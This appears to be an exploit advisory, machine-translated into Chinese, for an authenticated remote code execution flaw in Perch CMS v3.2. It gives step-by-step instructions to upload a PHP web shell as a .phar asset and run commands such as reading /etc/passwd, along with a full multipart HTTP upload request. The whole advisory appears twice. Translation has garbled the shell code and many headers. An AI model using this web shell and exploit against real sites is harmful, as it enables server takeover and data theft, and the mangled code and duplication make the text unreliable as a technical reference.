利用标题: Perch v3.2-远程代码执行(RCE)
Application: Perch CMS
版本: v3.2
BUGS: RCE
Technology: php
供应商URL: https://grabaperch.com/
软件link: https://grabaperch.com/download
发现日期: 21.07.2023
作者:MirabbasAğalarov
在: Linux上测试
2。技术细节POC
====================================================
步骤:
1。登录以作为管理员的帐户
2。去访问资产(http://localhost/perch_v3.2/perch/core/core/apps/Assets/)
3。添加资产(http://localhost/perch_v3.2/perch/core/core/apps/apps/Assets/edit/)
4。上传poc.phar文件
poc.phar文件内容:
?php $ a=$ _ get ['code'];回声系统($ a);
5。访问http://localhost/perch_v3.2/perch/resource/admin/poc.phar?code=cat%20/etc/passwd
POC请求:
post/perch_v3.2/perch/core/apps/assets/edit/http/1.1
HOST: LOCALHOST
内容长度: 1071
cache-control: max-age=0
SEC-CH-UA:
sec-ch-ua-mobile:0
sec-ch-ua-platform:''
升级- 不肯定- requests: 1
Origin: http://localhost
content-type:多部分/form-data;边界=--- webkitformboundaryygoerzn09hhsjd4z
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/114.0.5735.134 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Refureer: http://localhost/perch_v3.2/perch/core/core/apps/apps/apps/edit/
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: phpwcmsbelang=en; CMSA=1; phpsessID=689RDJ63VOOR49DCFM9RDPOLC9
连接:关闭
------ webkitformboundaryygoerzn09hhsjd4z
content-disposition: form-data;名称='Resourcetitle'
测试
------ webkitformboundaryygoerzn09hhsjd4z
content-disposition: form-data;名称='image';文件名='poc.phar'
content-type:应用程序/钟表流
?php $ a=$ _ get ['code'];回声系统($ a);
------ webkitformboundaryygoerzn09hhsjd4z
content-disposition: form-data;名称='image_field'
1
------ webkitformboundaryygoerzn09hhsjd4z
content-disposition: form-data;名称='image_assetid'
------ webkitformboundaryygoerzn09hhsjd4z
content-disposition: form-data;名称='Resourcebucket'
行政
------ webkitformboundaryygoerzn09hhsjd4z
content-disposition: form-data;名称='标签'
测试
------ webkitformboundaryygoerzn09hhsjd4z
content-disposition: form-data; name='btnsubmit'
提交
------ webkitformboundaryygoerzn09hhsjd4z
content-disposition: form-data;名称='formaction'
编辑
------ webkitformboundaryygoerzn09hhsjd4z
content-disposition: form-data;名称='token'
5494AF3E8DBE5AC399CA7F12219CFE82
------ webkitformboundaryygoerzn09hhsjd4z--
Application: Perch CMS
版本: v3.2
BUGS: RCE
Technology: php
供应商URL: https://grabaperch.com/
软件link: https://grabaperch.com/download
发现日期: 21.07.2023
作者:MirabbasAğalarov
在: Linux上测试
2。技术细节POC
====================================================
步骤:
1。登录以作为管理员的帐户
2。去访问资产(http://localhost/perch_v3.2/perch/core/core/apps/Assets/)
3。添加资产(http://localhost/perch_v3.2/perch/core/core/apps/apps/Assets/edit/)
4。上传poc.phar文件
poc.phar文件内容:
?php $ a=$ _ get ['code'];回声系统($ a);
5。访问http://localhost/perch_v3.2/perch/resource/admin/poc.phar?code=cat%20/etc/passwd
POC请求:
post/perch_v3.2/perch/core/apps/assets/edit/http/1.1
HOST: LOCALHOST
内容长度: 1071
cache-control: max-age=0
SEC-CH-UA:
sec-ch-ua-mobile:0
sec-ch-ua-platform:''
升级- 不肯定- requests: 1
Origin: http://localhost
content-type:多部分/form-data;边界=--- webkitformboundaryygoerzn09hhsjd4z
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/114.0.5735.134 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Refureer: http://localhost/perch_v3.2/perch/core/core/apps/apps/apps/edit/
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: phpwcmsbelang=en; CMSA=1; phpsessID=689RDJ63VOOR49DCFM9RDPOLC9
连接:关闭
------ webkitformboundaryygoerzn09hhsjd4z
content-disposition: form-data;名称='Resourcetitle'
测试
------ webkitformboundaryygoerzn09hhsjd4z
content-disposition: form-data;名称='image';文件名='poc.phar'
content-type:应用程序/钟表流
?php $ a=$ _ get ['code'];回声系统($ a);
------ webkitformboundaryygoerzn09hhsjd4z
content-disposition: form-data;名称='image_field'
1
------ webkitformboundaryygoerzn09hhsjd4z
content-disposition: form-data;名称='image_assetid'
------ webkitformboundaryygoerzn09hhsjd4z
content-disposition: form-data;名称='Resourcebucket'
行政
------ webkitformboundaryygoerzn09hhsjd4z
content-disposition: form-data;名称='标签'
测试
------ webkitformboundaryygoerzn09hhsjd4z
content-disposition: form-data; name='btnsubmit'
提交
------ webkitformboundaryygoerzn09hhsjd4z
content-disposition: form-data;名称='formaction'
编辑
------ webkitformboundaryygoerzn09hhsjd4z
content-disposition: form-data;名称='token'
5494AF3E8DBE5AC399CA7F12219CFE82
------ webkitformboundaryygoerzn09hhsjd4z--
